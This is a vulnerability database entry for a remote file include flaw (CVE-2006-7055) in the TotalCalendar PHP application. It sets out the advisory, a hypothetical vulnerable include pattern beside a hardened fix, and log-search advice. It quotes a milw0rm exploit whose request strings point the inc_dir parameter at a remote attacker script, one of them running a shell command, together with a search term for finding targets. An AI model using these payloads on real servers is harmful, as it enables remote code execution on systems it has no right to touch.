TotalCalendar 'index.php' Multiple PHP Remote File Include Vulnerabilities

Vulnerability ID: 1110216    Type: Input validation
Published: 2006-05-05    Updated: 2007-02-27
CVE: CVE-2006-7055    CNNVD ID: CNNVD-200702-473
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/1753
https://cxsecurity.com/issue/WLB-2007020093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-473
|Details
TotalCalendar is a web-based calendar and scheduling application. It fails to validate input when handling user requests, so a remote attacker can execute arbitrary commands on the server with the privileges of the web server process. The about.php and auth.php scripts (and, per the exploit below, index.php) pass the inc_dir parameter into an include without validating it. This lets an attacker include arbitrary local files or, where the PHP configuration permits URL includes (allow_url_fopen on PHP before 5.2, allow_url_include on 5.2 and later), a remote file under the attacker's control, giving arbitrary code execution.
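The following is an added example and not TotalCalendar's own code: a hypothetical reconstruction of the include pattern the advisory describes, placed beside a hardened version. The parameter name inc_dir comes from the advisory; the file name header.php, the allowlist, INCLUDE_ROOT and the function names are assumptions.

```php
<?php
// Added example, not code from TotalCalendar. Hypothetical reconstruction of
// the pattern the advisory describes: an include path built from the request.
// 'inc_dir' is the real parameter name; 'header.php', INCLUDE_ROOT and the
// function names are assumptions.

// VULNERABLE: the include directory is taken straight from the query string.
// On PHP < 5.2, allow_url_fopen=On is enough for include() to fetch a URL;
// on 5.2+, allow_url_include=On is also needed. A request such as
//   index.php?inc_dir=http://attacker.example/shell.txt?
// makes PHP fetch http://attacker.example/shell.txt?/header.php and run the
// response as PHP: the trailing '?' pushes the appended '/header.php' into
// the query string, so the attacker's URL still resolves.
function render_vulnerable(): void
{
    $inc_dir = isset($_GET['inc_dir']) ? $_GET['inc_dir'] : 'includes';
    include $inc_dir . '/header.php';
}

// HARDENED: no part of the include path comes from the request. Only the
// page name is user-chosen; it must match an allowlist, and the resolved
// file must sit inside INCLUDE_ROOT (defeats ../ traversal and symlinks).
const INCLUDE_ROOT  = __DIR__ . '/includes';
const ALLOWED_PAGES = ['header', 'footer', 'about', 'auth'];

function safe_include(string $page): bool
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return false;                       // unknown page name: refuse
    }
    $root = realpath(INCLUDE_ROOT);
    $path = realpath(INCLUDE_ROOT . '/' . $page . '.php');
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;                       // missing, or outside the root
    }
    include $path;
    return true;
}

// Defence in depth: refuse remote includes at the interpreter level as well.
// php.ini:  allow_url_include = Off   (PHP >= 5.2)
//           allow_url_fopen   = Off   (older PHP; also blocks fopen() of URLs)
```

The real fix is to remove inc_dir as a request parameter altogether, which is what the vendor's Security_Patch.zip linked under References is for. As a quick check for past exploitation, search the web server access logs for requests carrying inc_dir= followed by a URL scheme (`://`, or its encoded form `%3A%2F%2F`); the exploit below shows exactly that shape.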
|Exploit
Title: TotalCalendar <=2.30 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------

Exploitation:

/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# milw0rm.com [2006-05-05]
|References

Source: sweetphp.com
Link: http://sweetphp.com/files/downloads/patches/TotalCalendar/Security_Patch.zip
Source: XF
Name: totalcalendar-about-file-include(25878)
Link: http://xforce.iss.net/xforce/xfdb/25878
Source: BID
Name: 17618
Link: http://www.securityfocus.com/bid/17618
Source: BUGTRAQ
Name: 20060423 [MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/431866/30/5370/threaded
Source: OSVDB
Name: 25237
Link: http://www.osvdb.org/25237
Source: MILW0RM
Name: 1753
Link: http://www.milw0rm.com/exploits/1753
Source: sweetphp.com
Link: http://sweetphp.com/nuke/index.php
Source: SREASON
Name: 2290
Link: http://securityreason.com/securityalert/2290